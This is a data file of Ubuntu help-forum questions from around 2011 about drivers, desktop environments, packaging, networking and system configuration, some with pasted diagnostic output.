57554	how can i troubleshoot my installation of the latest broadcom driver ?	i would like to install the latest version of the broadcom wireless driver ( hybrid-portsrc_x86_64-v5_100_82_38 ) . i 'm using ubuntu 10.04 ( linux kernel : 2.6.32-33-generic ) . according to the lspci command , my network controller is `` network controller : broadcom corporation bcm4311 802.11b/g wlan '' . i found the linux driver of bcm4311 at http : //www.broadcom.com/support/802.11/linux_sta.php . then , i followed the instructions at http : //www.broadcom.com/docs/linux_sta/readme.txt to install http : //www.broadcom.com/docs/linux_sta/hybrid-portsrc_x86_64-v5_100_82_38.tar.gz . specifically , i removed all of the existing wl , ssb and b43 modules . then , i built the module and loaded it . all of the depmod , modprobe and insmod finish without reporting any problems . and , the lsmod command shows my new wl module . but , my network manager does n't show any wireless connections . the following is the output of the lspci -n | grep 14e4 command on my machine : 09:00.0 0200 : 14e4:1673 ( rev 02 ) 0c:00.0 0280 : 14e4:4311 ( rev 01 ) the following is the output of sudo lshw -c network : *-network unclaimed description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f6cfc000-f6cfffff how can i troubleshoot my problem with the latest version of the broadcom driver ?
57555	dock expose in gnome classic ?	is there any dock that has the dock exposăš feature in gnome classic ?
57556	transferring mails and user setting to new mail server	we have a mail server running debian 5.0 . it is one year old now but we want to deploy a new server with ubuntu server 10.04 . the problem is that we want to transfer all the user mails and settings to the new mail-serverl . so all their usernames and passwords should be the same , all their mails should be transferred successfully to the new mail server . in the old mail server we are using squirrel mail as frontend , but in the new mail server we are planning to use round cube . the existing server is using mbox and postfix . how can we achieve this , i am looking for some detailed tutorial or guide to do this and have n't found any on google . is it possible to do this ?
57557	is there any differences between gnome-global menu and appmenu-indicator ?	i 'm wondering that is there any differences between gnome-global menu and appmenu-indicator ? or are they just only one ? which one is still being developed ?
57560	transmission causes network drop in ubuntu 11.04	i am running ubuntu 11.04 on an asus eeepc netbook . i 've noticed that when i am downloading using the latest ( as of aug 17 ) transmission , my network completely drops ( i can not ping the gateway , all other network apps stop working ) . i have to tell ubuntu to reconnect before anything will work again . i have n't tried much but fiddle with some transmission settings to no avail . does anyone have any ideas how i can fix this ? i 'm not familiar with anything like rebuilding a kernel to upgrade the network or anything . to add , this problem did not happen when i had ubuntu 9.04 installed with whatever latest build of transmission it had .
57568	window 7 to ubuntu migration	my company is moving from windows to ubuntu . please suggest free alternative for canonical landscape . ( free ) antivirus as per windows security team norms . i know antivirus not needed in linux . poor windows security techie person . ldap solution
57569	usb tethering ( over usb ) with android 2.2 not working	it 's working with maverick , but it breaks with natty . os detect device , network-manager tries to connect ( 1 ) , but fails ( 2 ) : output of dmesg , lshw , lsusb , lspci , nm-tool , ifconfig and lsmod on pastebin
57572	how to delete file ( s ) in secure manner ?	is there a way to make sure that a deleted file can not be recovered ? as you know , deleting a file by pressing shift-del or using trash does n't mean that file is gone forever . it resides somewhere in the computer . in day to day life , law enforcement or thieves use recovery programs to reveal our private data or something else . they can recover all data that resides on hard disk , in ram , and even usb . to protect us from these people , what should one do ? which program should one use ? note : i do n't want an answer like first use a recovery program then erase that file with shred . with just one program , i want to erase all unused/deleted files on my computer .
57579	manage ubuntu 11.10 desktop from server webconsole	are there any alternatives to ubuntu landscape as i want to manage ubuntu desktops of different version 10.04,11.04 and 11.10
57586	how can i disable arbitrary default multitouch gestures in unity ?	i 'm using a custom touchăšgg multitouch gesture setup in ubuntu 11.04 with a magic trackpad . since the default gestures ( such as 3-finger tap and drag to move windows , 4 finger tap to reveal the dash , etc . ) are apparently hardcoded in unity , i 'm unable to assign any custom touchăšgg actions to them , and some default gestures ( that i do n't intend to use much , if at all ) occasionally mix up with my similar custom-assigned ones and get triggered by accident . is there a practical way ( short of tweaking the utouch source ) to disable some of the default gestures ? if not , pointers to parts of the code ( perhaps in grail ? ) where the default gestures are defined , and help with tweaking would also be appreciated .
57588	how do i add groups to empathy 's contact list ?	i 'm wondering how i can add new group to empathy 's contact list ?
57589	nothing happens when i click on transmission 's tray icon	normally a menu should pop up allowing me to show the program 's window ( it 's minimized to tray ) , but when i click on the tray icon , nothing happens . this happens for almost all tray icons , i 'm just using transmission as an example .
57590	how can i troubleshoot a failed local network vnc connection ?	on machine a , i start remmina ( 0.9.3 ) and create a vnc incoming connection profile . i picked port 5900 , with a username and password . no changes under advanced or ssh . i start the profile and it says `` listening on port 5900 for an incoming vnci connection ... '' on machine b , i start remmina and create a vnc profile . i set machinea.local:5900 as the server , enter the username and password and leave everything else as-is . i start the profile and it says `` connecting to 'username @ machinea ' ... '' patience is a virtue , but half an hour later there 's still nothing but those message windows . so far i 've : made sure ufw is n't enabled confirmed i can ping and ssh from machine a to machine b and vice versa tried on other ports tried without a username and password googled aimlessly made a cup of tea what 's next ? further actions taken : confirmed i can successfully telnet machinea.local 5900 from machine b ( thanks pavlos g. ) run ifconfig on machine a to get network ip address ( 10.0.0.x ) attempt ping , telnet and remmina using ip address instead of hostname confirm you 're not trying to set up a reverse vnc connection confirm you 're using not trying to using client software as a server ( doh ! )
57602	how do i enable ati radeon 9200 drivers so i can use unity ?	i have installed ubuntu 11.04 on my hp pavillion zx500 with the ati radeon 9200 graphics card . it works fine right now but the only problem is that the unity desktop doesnt come on . it makes me have to use the classis one and the only reason i installed linux is to use unity . does it need hardware acceleration for unity ? i installed it on my pc and liked it so much i installed it on my laptop . i have heard there are drivers for ati cards in linux . i am new to linux , can anybody tell my how to get the right drivers or enable unity ?
57603	how to list recursive file sizes of files and directories in a directory ?	how do i list all the files in a directory and their recursive file sizes ? -- -edit i want to see the sizes 'rolled up ' to the parent directories in the directory listed . i do n't want to see the child directories or their contents or sizes .
57611	how do i ssh and remove all previous ssh activity history ?	i want to remove any and all activity logs for ssh remotely . how do i get to it ? my account on the remote server does n't have admin privilege , and as such i just want to remove user to user connection records .
57612	dell m6600 , amd firepro m8900 , graphics driver and power issues	i 've just received a m6600 and tried to install ubuntu 11.04 on the machine with some pretty poor results . by default the radeon driver is used for the graphics card however it appears to run very poorly ( screen re-drawing visible , tearing of dialogs while moving them ) . i installed , through jockey , the fglrx driver ( however i do n't know the version that was installed ) with even poorer results . all conditions were exacerbated , was almost impossible to use the machine because of tearing while moving windows and typing . with radeon driver installed , i check with powertop and see that radeon module is 65 % of my inturrupts and that i 'm using 70w of power ( only 1 hour of battery life ) . i will check the fglrx module also , however its even more unusable . please , any help would be appreciated ! i can not find release notes for the fglrx modules to know if this card is supported .
57614	ubuntu partitioner	i have a backtrack 5 distribution which is based on ubuntu . during the instalation it somehow managed to create a separate partition ext4 on a external harddrive which was based on ntfs . now this external harddrive is devided into two partitions . my problem is that i dont't think windows wil recognize ext4 but i also would like to merge those two back together . is there any good partitioner for linux , which will merge both to ntfs ?
57620	getting an `` authentication token manipulation '' error when trying to change my user password	i am logging in to my ubuntu server using my username . once i am logged in i am typing passwd command . entering a new password but a second after getting following error messages : passwd : authentication token manipulation error passwd : password unchanged what is wrong here ? how can i change my password otherwise if i do n't have access to that server physically , i.e . i am connecting remotely with ssh using terminal .
57621	system not reaching login on gui	yesterday i finally got around to upgrading from 10.04 to 11.04 ( i 'm very forgetful about such things ) . i did an upgrade through the update manager , first to 10.10 , then to 11.04 . unfortunately , i 've run into an issue , stemming primarily ( i believe ) from the fact that my hardware does n't seem to support unity . when i boot my machine , i get a screen that looks like this one ( linked because the original image is kinda large ) . it stays on this screen indefinitely , with no animation , no mouse movement , no dialogs , etc . however , i am still perfectly able to connect to the machine via ssh , and even create nomachine connections with a gnome session running on the computer . so it is n't freezing , it just no longer presents a working gui frontend on the primary monitor . needless to say , this is inconvenient . so i 'm going to purchase a unity-approved graphics card for the beast , but i 'm wondering if there 's anything i can do in the meantime , to get a gnome or xfce session going when i 'm at the physical machine . thanks to ssh it would be very easy for me to manipulate config files . edit : information about my graphics card : $ lspci -v | grep vga 00:10.0 vga compatible controller : nvidia corporation c73 [ geforce 7050 / nforce 610i ] ( rev a2 ) ( prog-if 00 [ vga controller ] )
57633	ubuntu one does not sync : firewall settings ?	i 'm new to linux . i installed ubuntu 11.04 on a partition and i love it , but ubuntu one does not work . i created a free account and a directory ubuntu one appeared automatically , as expected . i copied there some files and a couple of directories , just text files , therefore very light . u1 tries to sync , but fails and keeps on trying again . when i close the session i must force exit , because it is still trying . my router has a firewall : can it cause the failure ? when i use windows , on the other partiton , i have no problem with dropbox .
57645	override pear channel in debian/pearrc to package php-savant3	i 'm packaging php-savant3 using dh-make-pear in lucid , which makes use of cdbs 's pear.mk . savant uses its own pear channel , which i can not configure in the build chroot ( be it pbuilder , sbuild or your favorite chroot ) using debian/rules . however , i see that the pear command launched by cdbs is : /usr/bin/pear \ -c debian/pearrc \ -d include_path=/usr/share/php \ -d php_bin=/usr/bin/php \ -d bin_dir=/usr/bin \ -d php_dir=/usr/share/php \ -d data_dir=/usr/share/php/data \ -d doc_dir=/usr/share/php/docs \ -d test_dir=/usr/share/php/tests \ install -- offline -- nodeps -p $ ( deb_destdir ) $ ( pear_source_dir ) /package.xml which suggests that some parameters can be overridden in debian/pearrc . i have tried putting the register key for the servant channel in debian/pearrc but it does n't work . is there a way i can tell pear what this channel is about so that it does n't crash the build in the chroot ?
57654	is there any value to using deja dup in addition to ubuntu one file sync ?	i 'm running ubuntu 11.04 64bit and am currently using ubuntu one file sync for all of my files and devices . i just discovered deja dup and was wondering if it was a good idea to use it in addition to ubuntu one ?
57655	can 't find thunderbird	i was using tb 5.0 then the system requested to upgrade to v 6.0 i tried to installed from the .tar.bz2 file , extracted the files but was not be able to make it run . then tried to install it through synaptic package manager and ubuntu software center but i ca n't find thunderbird . is not under `` applications '' `` internet '' ( i did tried '' edit menus '' ) etc . i can see at synaptic package manager that it is installed but ca n't find it . i think parts of the program are still in there so the system did n't recognize the new install . any suggestions ? thanks .
57656	how do i set up grub in a usb to boot into an img ?	i have an img file that i 'd like to copy into an empty usb and boot from it , how do i go about doing it ?
57659	server , gui , then uninstalling the gui	i 'm planning to turn my old powerpc g4 into a wordpress website . i 'd like to use the server edition of ubuntu 10.04 , install a gui ( to set up wordpress ) then uninstall the gui . would i be able to do that ?
57661	kernel module nvidia with bumblebee	bumblebee is refusing to work due to unable to finding the nvidia kernel module ( i think ) but i do have others . junke @ 1215n : ~ $ modprobe nv # tab tab : ) nvidia-current nvidiafb nvram nv_tco should i just create a symlink to nvidia-current ( and where ? ) or will this make matters worse ?
57676	what flavour of ubuntu desktop should i use ?	i have a powerpc , 800mhz 832mb of ram . currently running mac osx tiger . i have tried ubuntu 10.04 and it 's way too slow . xubuntu is also too slow for regular usage ( gui elements lag a lot ) . which ubuntu desktop flavor should i use ?
57682	find ( and reinstall ) packages with corrupted files ( without breaking anything )	i usually prefer to fix a linux system than to reinstall from scratch . my computers have seen many distribution upgrades and a list of ppas or third-party repositories . apt usually makes sure that everything works in the end . however , the fact that the package manager thinks that all required packages are 'installed ' does not guarantee that all the files are present on the file system . such a such situation may occur if you have to work-around dependency problems with dpkg -- force-* . one could also reproduce such a situation by deleting a file from /usr as root . is there a simple way to verify whether all files belonging to an installed package are present ? if a such a problem package is found , aptitude reinstall fixes the problem .
57689	what should i do with my reinstallation of ubuntu ?	i tried to install ubuntu 11.04 side-by-side with my windows on my hp pavillion g6 , but it caused me a lot of different troubles . so i tried to reinstall ubuntu on all of the disk memory with a live-boot cd , but everytime i use the cd it takes me to a login-screen for ubuntu ( with no users to choose ) and wants me to write in a username and a password . from here i get nowhere and now i 'm stuck . should i try to install ubuntu some other way or does anyone have an idea of what i should do ? thanks for your help ! update for answer by pavlos g : my problems are many . first of i left the idea of having windows side to side with ubuntu and wanted to install only ubuntu . so windows is not really the issue , but the problems i had ( or have ) were two major ones : first , windows would not start . it only said `` put in your windows installation cd '' and i think that something went wrong during the partitioning part of the installation . second first did not wo n't to start at all which i learned how to fix , but than i got other problems . the computer asked me to install a special device for my graphic card ( amd radeon hd 6470m ) and i did . when i reboot the computer later on unity was gone and ubuntu had gone back to gnome . so i figured out because i had nothing on the computer ( it 's new ) i could make a reinstallation instead . which no is the problem , but i think your link maybe can fix it . thanks !
57692	i 'm whining about wine , windows and linux	if i run a program that 's windows ( exe ) on a linux system , find out that it was infected with a virus , will it just crash the program or somehow make my system in-stable ? i 'm assuming that it would n't harm my system at all , because my os is linux and the windows executable can not run on mine -- but then wine does it ...
57704	is there a ubuntu sanity check	is there a standard procedure to 'unit test ' an ubuntu system against the deb packages ? assume , a system has ubuntu-desktop installed according to the package manager . can i find out , whether the file system has all the files in ubuntu-desktop and dependencies ? related question : find packages with corrupted files
57725	is there a safe way to reinstall via the package manager ?	assume , i have a system with all the packages installed , which i want , and all configuration files set up as desired . however , the files on the file system could have become corrupted or missing due to some mistake in the past or hardware error . the corrupted files would be replace if the package in question was reinstalled . such a situation is described elsewhere can i safely run aptitude reinstall ? installed to get a fresh version of my system ?
57730	is there a terminal that runs inside a web browser ?	i 'm at a public place , windows computers galore ( library ) . i 'm sshing into my ubuntu server box somewhere else . i open command prompt and remember that i read `` you will be banned from using the computers if you make any changes to system files '' . ( sillily , it automatically restores from a restore point everyday ) . i have no intention whatsoever to hack into the computer . if i 'm sshing into my box it appears as though i 'm `` hacking '' into the computer ( because someone might see the white text on black screen ) . i 'd like to somehow do it in a web browser with nice happy looking text , so that it actually represents what i 'm doing ; i 'm not going to hack into the computer , i 'm only using a computer somewhere else .
57735	how to remove ttf-mscorefonts completely ?	i tried remove the installer itself , but the fonts are still there..is there away to completely remove the fonts ?
57736	what keypress will take me to tty13 ?	trying out ubuntu intrepid , i have discovered that rightalt+f1 does n't take me to tty13 . i 've exhaustively tried every option presented to me in dpkg-reconfigure console-setup , the best i 've been able to manage thus far has been to have both alt keys behave the same ( leftalt+f1 and rightalt+f1 both going to tty1 ) . please note that using gnu screen is not considered a valid response to the question - this is specifically about how to get the keyboard to behave properly with multiple consoles under ubuntu . the crazy thing is that every other distro i 've tried just handles this correctly , including debian lenny .
57747	is there a way to test packages i build for correct dependencies ?	i 'm absolutely new to packaging , so forgive me if i am asking something obvious for an experienced packager ... how can i be sure that mentioned all the dependencies correctly in my package ? say that my application make use of lib library-xyz which is not installed by default . if i build the package and install it on my developing machine , library-xyz will be installed already , so - even if i failed to mention it as a dependency - the program will still run correctly . but another user on a fresh install of ubuntu wo n't have library-xyz installed and the program will likely crash for him . the way i am testing now is having a fresh ubuntu install running in a vm and installing the package there , but since it seems like a common problem , i wonder if there is a better way to test , something adopting the same philosophy of chroot but that - instead of `` cutting out '' parts of the filesystem would `` cut out '' all those installed packages that are not `` default '' in a clean ubuntu installation . i 'm packaging python programs .
57752	do n't raise window on click ( while hold )	it seems that compiz support forum is used for spam , and as i noticed similar questions answered here , i thought it 'd be best for me to ask here i 'm on ubuntu 11.04 and window manager uses compiz while on windows i got used to this feature which i 'll try to explain : imagine simple drag & drop operation - i have explorer maximized and i open notepad on top of it . now , if i click and hold mouse button on a file in explorer , notepad loses focus but it 's still visible - explorer window is n't raised over it , so i can finish my drag & drop operation . that 's not happening on linux , and i want to make it somehow . in compiz 'general options ' there are similar settings , but nothing can bring me this feature back it seems . sourced from internet it seems also that openbox window manager allows this feature while pressing super/win keyboard button . so i want to know if this is somehow possible with compiz or alternatively metacity ( i know that i can hover on launcher , then raise application and drop , but for some reason it 's not reliable always [ 1 ] , and i find above feature more easier ) [ 1 ] launcher shades , then hovered application raises but it does not accept dropped source
57753	how to convert ubuntu to xubuntu	i 've been having enough problems with unity that i 've actually installed xubuntu fresh on my laptops . unfortunately , my main desktop was upgraded over the net from ubuntu 10.04 to 11.04 and , even though i 've gotten gnome-panel up and running ( and disabled as much as possible of the unity shortcuts ) , i still prefer the xubuntu desktop . is there a way to switch from ubuntu to xubuntu ( or unity to xfce ) without having to go through all the backup/install/restore stuff ? can we simply download a package of some sort that will install xfce as the window manager ? is this even a sane thing to consider or should i bite the bullet and re-install totally ?
57756	what do i need to get started with thin clients ?	i 'm planning to make an ubuntu server ( with load balancing to a few offstage computers ) and have thin clients connect to it . unfortunately , i do n't know how to make a thin client , or the setup involved . i really like virtualization and servers and stuff like that . basically , i 'd have a resource pool of computers sitting underneath a desk and i could have another computer , somewhere else that runs off of it ... i 'm not sure if i 'm getting the concept right .
57761	my dropbox and network indicators moved to the bottom panel	i log in and now my dropbox and network indicators are on the bottom panel just right of center . instead of the top panel just left of the time . i do not know why they moved or how to put them back . even if i wanted them on the lower panel , i would not want them nearly centered . clicking or right clicking or attempting to drag to the top panel just opens my dropbox folder or my network menu . how can i get them where i want them ?
57766	how to turn off automatic pre-rendering of pages in google chrome	i get normally pissed off when chrome automatically renders google search results of addresses before i even finish typing . how do i turn this off in chrome 13 ?
57770	dynamic display output switching	there are similar issues to this raised before , and in general many about multiple monitors since unity , but not this precise one , and no complete answers . i have a couple of dell precision laptops ( most recently m4600 - with nvidia quadro 2000m gpu ) , which have fn+f8 as the dynamic display switch ( loops round laptop - > laptop+external - > external only , like most laptops ) . until ubuntu 11.04 this worked fine ( for several years ) but since 11.04 its been broken . just does n't work . i 've tried to find solutions , hacks , etc , have posted on official ubuntu forums , but it 's just broken . i travel a lot and give a lot of ( scientific ) presentations , and really need this functionality . since 11.04 i have to stand up at a conference , plug in my laptop and then go through the hassle of nvidia-settings , detect displays , mirror displays , apply , etc . argh . its the biggest issue i 've had with ubuntu in years . i 've taken to giving other people pdf files to show on their laptops , which excludes me from showing animations of data , etc . here 's hoping i 'm being daft and someone can help me out . note that the projectors used are all different in different places , so they have to be dynamically detected each time ( but , then again , 10.10 and all previous ubuntus did this fine . ) .
57773	do i need to install update manager whenever it is displayed ?	when i open my computer and want to use ubuntu 10.04 i find update manager every week displayed on my computer asking for installation . do i need to install whenever it is being asked , or i can ignore it ? how many times in a month do i need to install it ?
57778	xorg.conf to get current `` section `` device '' content	by default the xorg.conf does n't exist in /etc/ i could generate it by xorg -configure . however in order to do this . i need to stop xserver . i ca n't do it at the moment . so is it possible to get xorg 's content or at least on option which is section `` device '' ( the driver line )
57788	are the dark toolbars also coming to gtk2 applications ?	the gtk3 theme in oneiric has seen some improvements : dark toolbars and those awesome scrollbars i just discovered ( when not using the overlay scrollbars ) . are these improvements also coming to the gtk2 theme so we have consistency between gtk2 and gtk3 applications ?
57789	how to enter to the directory with 'cd ' command if it has 700 permission	i tried to use sudo cd name_of_dir but getting following error message : sudo : cd : command not found . is there any other way to open a directory which has 700 permission ?
57793	get only one package from 11.10 to install on 11.04	i need one really important package from oneiric to be installed ( upgraded ) on natty . how can i extract just single deb file ? ( 64 bit ) . should i use backports ? if yes , can you please tell me how to set the backports from oneiric ?
57797	why is the forum design lagging behind ?	way back when ubuntu 10.04 was released canonical changed the branding of ubuntu to the orange/purple combination which i kind of like so why more than one year later the ubuntu forums still look like this : so why the long wait ?
57801	unity does not work - segmentation fault	the unity interface never appeared on my laptop ( natty - intel 945gme ) . though , according to the unity_support_test script it sould work : /usr/lib/nux/unity_support_test -p opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) 945gme gem 20100330 development x86/mmx/sse2 opengl version string : 1.4 mesa 7.10.2 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity supported : yes it is not really a serious problem since i can use ubuntu classic , but i would like to know what is wrong in my system . now if i try unity -- replace from ubuntu classic , a segmentation error occurs and some problems appear instead of unity ( currently open windows `` lose '' their title bar , bottombar tabs are still there but no longer work , etc ) , so that i must use something like metacity -- replace to revert to a working state . please can someone smart explain me what is wrong , so that i can fix my system and maybe discover what unity is ... edit : i also get a segmentation error with compiz -- replace . here is the output of unity -- replace : backend : gconf integration : false profile : unity adding plugins initializing core options ... done window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 0 initializing bailer options ... done initializing detection options ... done initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing mousepoll options ... done initializing vpswitch options ... done initializing animation options ... done initializing snap options ... done initializing expo options ... done initializing move options ... done initializing place options ... done initializing grid options ... done initializing gnomecompat options ... done initializing wall options ... done initializing ezoom options ... done initializing workarounds options ... done initializing staticswitcher options ... done initializing resize options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing scale options ... done initializing session options ... done segmentation fault
57808	what is the 'popularity-contest ' package for ?	i 'm installing ubuntu server at the moment , and noticed it in the configuration phase . what does this package do , what is it for ?
57810	how to fix `` no soundcards found ''	i was trying to get iec958/spdif optical out working on my asus p8p67pro v3 motherboard running natty and i seem to have wiped out a crucial part of my sound setup . here is the output from some relevant commands ( i hope ) : sudo aplay -l aplay : device_list:240 : no soundcards found ... ls /cat/asound* ls : can not access /proc/asoun* : no such file or directory lspci -v 00:1b.0 audio device : intel corporation 6 series chipset family high definition audio controller ( rev 05 ) subsystem : asustek computer inc. device 8469 flags : bus master , fast devsel , latency 0 , irq 22 memory at fe720000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : oss_hdaudio kernel modules : snd-hda-intel pactl stat currently in use : 1 blocks containing 63.9 kib bytes total . allocated during whole lifetime : 41 blocks containing 1.8 mib bytes total . sample cache size : 0 b server name : pulseaudio server version : 0.9.22-24-g67d18 default sample specification : s16le 2ch 44100hz default channel map : front-left , front-right default sink : auto_null default source : auto_null.monitor cookie : bed7e0b0 any advice greatly appreciated .
57813	why is magento not packaged for ubuntu ?	i know it is simple to download and install but so are many other applications such as phpmyadmin , drupal and zend framework and they are all just an apt-get away . why is there no package for magento in the repositories or apparently from anywhere else ? is it a licensing issue ? the software is dual licensed under a commercial license and open software license ( osl 3.0 ) .
57815	how to test your speaker ?	i 'm trying to use skype in ubuntu 11 . but it fails . it seems something is wrong with my speak driver , how can i fix it ? it 's ok in windows .
57816	how to prevent kde from loading the gnome desktop for fullscreen applications ?	every time i start an application that is using fullscreen mode in kde my gnome desktop background is loaded before starting the program . this is aesthetically diturbing and i suspect there is a waste of ressources when the gnome system is somehow started in the background . affected are : wine applications using fullscreen ( started via playonlinux ) virtualbox using fullscreen or scaled modus firefox flash plugin what i did ( inspired by some hints in various forums ) : replaced gdm with lightdm ( flash plugin seems to be fixed now ) used `` killall nautilus '' - but this had no effect at all . how can i make sure kde does n't use any gnome programs or settings in the background without removing gnome ( as gnome is used as an alternative login for testing purposes ! ) ? p.s . : i am using 11.04 ubuntu with kubuntu desktop installed , 64bit , newest nvidia drivers here 's the output of `` ps aex | tee '' as suggested : http : //paste.ubuntu.com/678832/
57824	auto-mount another user 's encrypted /home at login	i 'm using encrypted home directories , and in my day to day activities , i have two user accounts i switch between , one for personal stuff , one for work stuff . however , it 's fairly common that i need to access personal files for work stuff , or vice versa . so , how can i set up automatically mounting the other directory at login ? i use the same password for both , so the system should be able to access to the encryption keys at login time . i 've done a bit of googling , and i ca n't even figure out where the config files for this are ...
57825	virtualbox choking	i had virtualbox running just fine but on the update to 11.04 it choked . i am running : dkms version 2.1.1.2-5ubuntu1 virtualbox-ose-dkms v. 4.0.4-dfsg-1ubuntu4.1 virtualbox-ose-qt v. 4.0.4-dfsg-1ubuntu4.1 virtualbox-ose v. 4.0.4-dfsg-1ubuntu4.1 when i try to create a new machine or launch my existing machine , i get two alerts : kernel driver not installed ( rc=-1908 ) please install the virtualbox-ose-dkms package and execute 'modprobe vboxdrv ' as root . i tried that and got an error : fatal : module vboxdrv not found . the other alert just reads : failed to open a session for the virtual machine foo . the virtual machine 'foo ' has terminated unexpectedly during startup with exit code 1 . result code : ns_error_failure ( 0x80004005 ) component : machine interface : imachine { 662c175e-a69d-40b8-a77a-1d719d0ab062 } web forums all seem to suggest that other people addressed the latter error message by installing virtualbox 3.2.12 , but we 're past that now .
57832	repair and consulting service for home-users ?	i have a new laptop on which i installed ubuntu 10.04 lts ( dual boot with preinstalled windows 7 ) since about a month . however there are three consistent problems that i have not been able to get rid of , no matter where i look on the internet . the primary reason is that it is difficult to explain and diagnose such problems when one of many things might be the issue . since i am sadly not an expert ( yet ) , i would like to have some linux junkie have a look at my system and fix my problems . the problem is , i do not have a linux users group that is active in my vicinity . i hardly know any expert . so are there such services or people that look into such problems at affordable rates ? ( my problems are : this , this ( which regularly occurs now ) and a slow + erratic wifi connection which becomes smooth and fast in win7 ) or is it in the spirit of linux to find a problem , learn about it , and fix it ?
57833	how to move unity launcher to a different monitor ?	i have two monitors . the left monitor is set as primary , but the unity launcher appears on the right monitor . how can i move it to the other monitor ?
57840	how do i extract dns ips using a script ?	i want to extract the ip addresses and the hostnames from the dns server list ( 100 ips ) and put it in a file . what would be the best command to use ? i tried using cut but due to varying lengths of hostnames , the ips and hostnames do not come out together .
57851	running neuro-programmer 3 with wine	i bought neuro-programmer 3 . can anyone tell me how to run it on ubuntu 11.04 ? i installed wine and it said to : please set registry key hklm\software\microsoft.netframework\installroot to point to the .net framework install location i am new to ubuntu , any help would be greatly appreciated .
57855	how do i get kate to restore last used session ?	i have two computers and both have exactly the same behavior . i have the option `` load last used session '' selected , but every time , kate starts a new session . what could be causing this ? here are the permissions of ~/.kde/share/apps mike @ mike-laptop : ~/.kde/share/apps $ ls -l < .. > drwx -- -- -- 4 mike mike 4096 2011-08-19 10:58 kate < .. > mike @ mike-laptop : ~/.kde/share/apps $ ls -l kate -rw -- -- -- - 1 mike mike 2927 2011-08-19 10:58 metainfos drwx -- -- -- 5 mike mike 4096 2011-03-18 09:49 plugins drwxr-xr-x 2 mike mike 4096 2011-03-18 09:49 sessions also starting kate from the command line produces no output at all .
